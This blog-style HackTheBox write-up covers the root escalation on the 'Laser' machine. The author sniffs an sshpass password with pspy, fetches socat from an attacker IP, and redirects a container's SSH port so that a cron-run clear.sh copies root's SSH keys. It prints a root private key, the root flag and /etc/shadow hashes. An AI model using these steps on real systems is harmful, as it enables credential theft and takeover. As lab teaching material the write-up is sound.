2020/08/23 14:10:37 CMD: UID=0    PID=955    | /usr/sbin/irqbalance --foreground 
2020/08/23 14:10:37 CMD: UID=103  PID=942    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 

Running pspy, I immediately noticed an interesting process, sshpass, but the password appears to be masked. The job runs every 10 seconds.

2020/08/23 14:12:21 CMD: UID=0    PID=24209  | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /opt/updates/files/dashboard-feed root@172.18.0.2:/root/feeds/

sshpass is a utility designed for running ssh with "keyboard-interactive" password authentication, but in non-interactive mode. It's also known that sshpass is insecure: it makes only a minimal attempt to hide the password, overwriting its copy in the process arguments shortly after startup, which is why pspy shows a row of z's. A poller reading /proc fast enough can still win the race. Running pspy for some time, the password was indeed unmasked:

c413d115b3d87664499624e7826d8c5a
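That unmasking is just a race against /proc. A toy illustration of what pspy-style polling sees (my own sketch, runnable on any Linux box):

import os

# poll /proc for sshpass and dump its argv, the way pspy catches the
# password in the brief window before sshpass masks it with z's
for pid in filter(str.isdigit, os.listdir('/proc')):
    try:
        argv = open('/proc/%s/cmdline' % pid, 'rb').read().split(b'\0')
    except OSError:
        continue
    if argv and b'sshpass' in argv[0]:
        print(pid, argv)   # shows -p <password> or -p zzzz..., depending on timing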

So we found the docker container's root password. It belongs to the container at 172.18.0.2, reachable over the bridge interface br-3ae8661b394c. Logging in to the container as root using sshpass was successful.


Root access to the docker container is of no use by itself, so going back to the solr shell and watching the processes, we notice the following:

2020/08/23 16:46:01 CMD: UID=0    PID=142684 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz scp /root/clear.sh root@172.18.0.2:/tmp/clear.sh 
2020/08/23 16:46:01 CMD: UID=0    PID=142704 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 /tmp/clear.sh 
2020/08/23 16:46:01 CMD: UID=0    PID=142722 | sshpass -p zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ssh root@172.18.0.2 rm /tmp/clear.sh 

Three processes run one after another: the cron job uploads /tmp/clear.sh to the container, the next process executes it, and the third removes it. So we should concentrate on these.

So the plan is:

We already have the docker credentials, so we can redirect the container's SSH port back to the host. The cron job will then effectively connect to 127.0.0.1; that localhost connection is authenticated with root's private key rather than the password. Once it happens, the clear.sh it uploads and executes lands on the host, where we control its contents.

Socat and Privilege Escalation

socat (SOcket CAT) is a tool normally used to relay data between two addresses. Its usage looks like this:

socat [options] <address> <address>

socat -d -d - TCP4:10.10.10.10:80

So I'm going to use socat to do the port redirection: fetch a static socat binary onto the box, give it executable permission, and then push it to the docker instance.

solr@laser:~$ 
solr@laser:~$ wget http://10.10.14.21:8000/socat
--2020-08-23 17:37:22--  http://10.10.14.21:8000/socat
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat                    100%[===============================>] 366.38K   329KB/s    in 1.1s    

2020-08-23 17:37:24 (329 KB/s) - ‘socat’ saved [375176/375176]

solr@laser:~$ ls
data  log4j2.xml  logs	pspy64s  pspy64s.1  socat  solr-8983.pid  solr-8984.pid
solr@laser:~$ chmod +x socat
solr@laser:~$ ls -la
total 2680
drwxr-x---  8 solr solr    4096 Aug 23 17:37 .
drwxr-xr-x 14 root root    4096 Jun 26 13:02 ..
lrwxrwxrwx  1 solr solr       9 Jun 29 06:57 .bash_history -> /dev/null
drwxrwxr-x  3 solr solr    4096 Jul  6 07:06 .cache
drwxr-x---  5 solr solr    4096 Jun 29 04:50 data
drwx------  4 solr solr    4096 Jun 29 06:57 .local
-rw-r-----  1 solr solr    5027 Jun 26 13:02 log4j2.xml
drwxr-x---  2 solr solr    4096 Aug 23 13:46 logs
drwxrwxr-x  2 solr solr    4096 Jun 26 13:02 .oracle_jre_usage
-rwxrwxr-x  1 solr solr 1156536 Aug 22  2019 pspy64s
-rw-rw-r--  1 solr solr 1156536 Aug 22  2019 pspy64s.1
-rwxrwxr-x  1 solr solr  375176 Aug 23 17:31 socat
-rw-rw-r--  1 solr solr       5 Aug 23 13:44 solr-8983.pid
-rw-rw-r--  1 solr solr       8 Jun 29 04:46 solr-8984.pid
drwx------  2 solr solr    4096 Aug 23 13:52 .ssh
solr@laser:~$ 

Uploading socat to the docker instance

Now, upload socat to the docker instance and make it executable there:

solr@laser:~$ sshpass -p c413d115b3d87664499624e7826d8c5a scp socat root@172.18.0.2:socat
solr@laser:~$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2 chmod +x socat

In the next step, we connect to the docker instance with the root credentials, stop its sshd, and redirect port 22 to 172.18.0.1 (the host).

More about socat port redirection:

https://www.cyberciti.biz/faq/linux-unix-tcp-port-forwarding/

solr@laser:~$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
.
.
.
root@20e3289bc183:~# service ssh stop
 * Stopping OpenBSD Secure Shell server sshd                                              [ OK ] 
root@20e3289bc183:~# ./socat tcp-listen:22,fork TCP:172.18.0.1:22

The Other Terminal

Once the redirection is applied, socat keeps listening in that shell. So I opened another terminal and logged in again as solr over SSH.

I made a temporary file clear.sh in /tmp/: a small script that creates /tmp/exploit as a copy of /root/.ssh and chowns it to solr.

echo -e '#!/bin/sh\nmkdir -p /tmp/exploit; cp -R /root/.ssh /tmp/exploit/; chown -R solr:solr /tmp/exploit' > /tmp/clear.sh; chmod +x /tmp/clear.sh

I waited twenty seconds or so for the job to run. Once the cron job fired, the new directory /tmp/exploit appeared, containing root's .ssh/id_rsa.

solr@laser:/tmp$ cat /tmp/exploit/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIG5AIBAAKCAYEAsCjrnKOm6iJddcSIyFamlV1qx6yT9X+X/HXW7PlCGMif79md
zutss91E+K5D/xLe/YpUHCcTUhfPGjBjdPmptCPaiHd30XN5FmBxmN++MAO68Hjs
oIEgi+2tScVpokjgkF411nIS+4umg6Q+ALO3IKGortuRkOtZNdPFSv0+1Am6PdvF
ibyGDi8ieYIK4dIZF9slEoqPlnV9lz0YWwRmSobZYQ7xX1wtmnaIrIxgHmpBYGBW
QQ7718Kh6RNnvCh3UPEjx9GIh+2y5Jj7uxGLLDAQ3YbMKxm2ykChfI7L95kzuxQe
mwQvIVe+R+ORLQJmBanA7AiyEyHBUYN27CF2B9wLgTj0LzHowc1xEcttbalNyL6x
..........................[snip]................................
1u8GCx6aqWvy3zoqss6F7axiQsCOD/Q4WU/UHgGb5ndgBpevw+ga2CABiF9sN53E
BuF2tOzZmAZZH3dj3VuGn+xmYcO9cy7nX4qeera6z4MQMRUcJjf9HoOwqhuK8nTa
xeZ1WSAWwDx/7n4KiFyxBYHCpcfCQBz6cxkGXMSpwsW8Si2dAoHBAOEfVHHzY1NN
9zmBThmj4+LRziBTcVxT/KWtSaSbpmLE3gLqTqvRXSlNNM9ZFb2+TpPe1tGsINO3
nVIoF/A97pHpw2YRtbHFscJbhUCkP65ZOcQg+hQcBGvi9VEmfve/OPHMiSvTSBNS
bgJuljQ7Wp+CYpVpDpxoHgHOZCCdD+WRRlacU/GKkex1gYuoL7iHFVQuBMD6jyjo
1DfJUHHfYdOqwfQX2ZgUX0VPD2RvtP3Z0ta/VJJiWtE8o8RwHgjiGw==
-----END RSA PRIVATE KEY-----

Once I confirmed the private key was copied, I used another SSH session to connect as root@localhost with it.

solr@laser:/tmp$ ssh -i /tmp/exploit/.ssh/id_rsa root@localhost
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 23 Aug 2020 05:44:47 PM UTC

  System load:                      0.19
  Usage of /:                       42.3% of 19.56GB
  Memory usage:                     71%
  Swap usage:                       3%
  Processes:                        276
  Users logged in:                  2
  IPv4 address for br-3ae8661b394c: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.201
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:1961

 * Are you ready for Kubernetes 1.19? It's nearly here! Try RC3 with
   sudo snap install microk8s --channel=1.19/candidate --classic

   https://www.microk8s.io/ has docs and details.

73 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Aug 23 15:41:15 2020 from 10.10.14.16
root@laser:~# id
uid=0(root) gid=0(root) groups=0(root)
root@laser:~# ls -la
total 56
drwx------  6 root root 4096 Aug  4 07:04 .
drwxr-xr-x 20 root root 4096 May  7 12:38 ..
lrwxrwxrwx  1 root root    9 Jun 15 04:04 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  3 root root 4096 Aug  3 13:03 .cache
-rwxr-xr-x  1 root root   59 Jun 24 05:14 clear.sh
-rwxr-xr-x  1 root root  346 Aug  3 04:25 feed.sh
drwxr-xr-x  3 root root 4096 Jul  1 03:33 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rwxrwxr-x  1 root root  433 Jun 29 06:48 reset.sh
-r--------  1 root root   33 Aug 23 13:46 root.txt
-rw-r--r--  1 root root   66 Aug  4 07:04 .selected_editor
drwxr-xr-x  3 root root 4096 May 18 08:44 snap
drwx------  2 root root 4096 Jul  6 06:11 .ssh
-rwxr-xr-x  1 root root  265 Jun 26 11:36 update.sh
root@laser:~# cd /root/
root@laser:~# ls
clear.sh  feed.sh  reset.sh  root.txt  snap  update.sh
root@laser:~# cat root.txt 
a8908469127c2574074cc5675582808c
root@laser:~# 

And that’s all, we are root.

root@laser:~# cat /etc/shadow
root:$6$b2FcSDlvmrWQlTYc$XuAR1xjZc6XLbR9Q.HiVV2gLjtIwmsWIDFbG3Ghvrsx.3PEgswvif1Sb23SuiDPp0H1SSY4i8vJIAsL5Kewh3/:18432:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
sshd:*:18389:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
printer:!:18428::::::
mosquitto:*:18429:0:99999:7:::
dnsmasq:*:18429:0:99999:7:::
solr:$6$SUBQ8M9J8E9BsiO/$SKoqY7XgKDcNPuOtILDVnlrY7itKl9EF6A.RidWt6.kvCsSt98DKfzJCtMX/3aPpW5zGRDBuSZKlPVDAcHaoK/:18443:0:99999:7:::
root@laser:~# 

So that was the greatest journey so far. What a machine! Thank you for visiting and reading my writeup. See you soon.

Navin

Hey there, I'm Navin, a passionate infosec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write about HackTheBox machines and challenges, cybersecurity articles and bug bounty. If you are an HTB user and like my articles, please leave a respect on my profile: https://www.hackthebox.eu/nav1n
